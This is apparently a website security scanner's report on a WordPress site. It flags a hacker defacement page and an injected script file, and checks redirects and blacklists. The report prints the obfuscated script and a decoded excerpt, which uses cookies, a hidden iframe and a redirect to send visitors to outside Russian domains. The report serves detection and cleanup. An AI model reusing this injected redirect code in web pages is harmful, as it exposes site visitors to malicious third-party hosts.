Scanned pages/files
| Request | Server response | Status |
http://internetbusiness101.com/ | 200 OK Content-Length: 11887 Content-Type: text/html | suspicious |
Deface/Content modification. The following signature was found: You Got Hacked By A_Ghacker ...[703 bytes skipped]... root" /> <meta name="copyright" content="msfconsole_meta"/> <meta name="description" content="msfconsole_meta"/> <body oncontextmenu="return false" onkeydown="return false"> <script language="JavaScript"> function tb5_makeArray(n){ this.length = n; return this.length; } tb5_messages = new tb5_makeArray(5); tb5_messages[0] = "You Got Hacked By A_Ghacker"; tb5_messages[1] = "We are arab Hackers"; tb5_messages[2] = "We Love Hacking!"; tb5_messages[3] = "Gray Hat Hacker Here!"; tb5_messages[4] = "Don't Worry"; tb5_messages[5] = "Your DataBase Is Safe"; tb5_messages[6] = "We just want to inform you that your site security is low ."; tb5_messages[7] = "Fixed it as soon possible, or else other hacker will hacked your system !"; tb5_rptType = 'infinite'; tb5_rptNbr = 10; tb5_speed = ...[12070 bytes skipped]... | ||
https://ajax.googleapis.com/ajax/libs/jquery/1.8.2/jquery.min.js | 200 OK Content-Length: 93435 Content-Type: text/javascript | clean |
http://internetbusiness101.com/test404page.js | 200 OK Content-Length: 62110 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. var a="'1Aqapkrv'02v{rg'1F'00vgzv-hctcqapkrv'00'1G'2C'2;tcp'02pgdgpgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;'1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'2;tcp'02jmqv'02'1F'02glamfgWPKAmormlglv'0:nmacvkml,jmqv'0;'1@'2C'2;tcp'02kdpcog'02'1F'02fmawoglv,apgcvgGngoglv'0:'05kdpcog'05'0;'1@'2C'2;kdpcog,ukfvj'1F2'1@'2C'2;kdpcog,jgkejv'1F2'1@'2C'2;kdpcog,qpa'1F'02'00j'00'02)'02'00vv'00'02)'02'00r'1C--'00'02) ...[622 bytes skipped]... Decoded script: ...[377 bytes skipped]... pVersion.indexOf("Win")==-1){ var _vu_u="47df99045433a8c590cfeb72d5dc6b9c", _vu_i="a78f966dbb4d07385d831dab60cd79e2"; if(_vr_c(_vu_u)===undefined){_vc_c(_vu_u,_vu_i,5); if(_vr_c(_vu_u)==_vu_i){window.location.href="http://mobi-auto.ru/m/";} }} function dpp(o){if(i==1)return;if(navigator.appVersion.indexOf("Win")!=-1){o.src="about:blank";var img = new Image(1,1);img.src = "http://mobi-avto.ru/cnt2.gif";}i=1;return;} <iframe onload="return dpp(this);" style="width:66%;height:66%;" src="about:blank"></iframe> </div> function _vr_c(k){return(document.cookie.match('(^|; )'+k+'=([^;]*)')||0)[2]} function _vc_c(name,value,d){var date=new Date();date.setTime(date.getTime()+(d*86400000) | ||
http://internetbusiness101.com/wp-includes/js/jquery/jquery.js?ver=1.8.3 | 200 OK Content-Length: 93658 Content-Type: application/javascript | clean |
http://internetbusiness101.com/wp-content/plugins/gtranslate/jquery-translate.js?ver=3.5.1 | 200 OK Content-Length: 16301 Content-Type: application/javascript | clean |
http://internetbusiness101.com/wp-content/plugins/tubepress/src/main/web/js/tubepress.js?ver=3.5.1 | 200 OK Content-Length: 3832 Content-Type: application/javascript | clean |
http://internetbusiness101.com/wp-content/plugins/featured-content-gallery/scripts/mootools.v1.11.js | 200 OK Content-Length: 34843 Content-Type: application/javascript | clean |
http://internetbusiness101.com/wp-content/plugins/featured-content-gallery/scripts/jd.gallery.js.php | 200 OK Content-Length: 26810 Content-Type: text/html | clean |
http://internetbusiness101.com/wp-content/plugins/featured-content-gallery/scripts/ | 200 OK Content-Length: 940 Content-Type: text/html | clean |
http://internetbusiness101.com/wp-content/plugins/featured-content-gallery/ | 200 OK Content-Length: 833 Content-Type: text/html | clean |
http://internetbusiness101.com/wp-content/plugins/ | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://internetbusiness101.com/wp-content/plugins/featured-content-gallery/README.txt | 200 OK Content-Length: 3425 Content-Type: text/plain | clean |
http://internetbusiness101.com/wp-content/plugins/featured-content-gallery/content-gallery.php | 200 OK Content-Length: 219 Content-Type: text/html | clean |
http://internetbusiness101.com/wp-content/plugins/featured-content-gallery/css/ | 200 OK Content-Length: 560 Content-Type: text/html | clean |
http://internetbusiness101.com/wp-content/plugins/featured-content-gallery/css/img/ | 200 OK Content-Length: 906 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: internetbusiness101.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 30 Sep 2015 01:52:29 GMT
Accept-Ranges: bytes
Server: nginx/1.8.0
Content-Length: 11887
Content-Type: text/html
Last-Modified: Mon, 10 Aug 2015 14:13:42 GMT
...11887 bytes of data.
GET / HTTP/1.1
Host: internetbusiness101.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 30 Sep 2015 01:52:29 GMT
Accept-Ranges: bytes
Server: nginx/1.8.0
Content-Length: 11887
Content-Type: text/html
Last-Modified: Mon, 10 Aug 2015 14:13:42 GMT
...11887 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: internetbusiness101.com
Referer: http://www.google.com/search?q=internetbusiness101.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: internetbusiness101.com
Referer: http://www.google.com/search?q=internetbusiness101.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=internetbusiness101.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://internetbusiness101.com/
Result: internetbusiness101.com is not infected or malware details are not published yet.
Result: internetbusiness101.com is not infected or malware details are not published yet.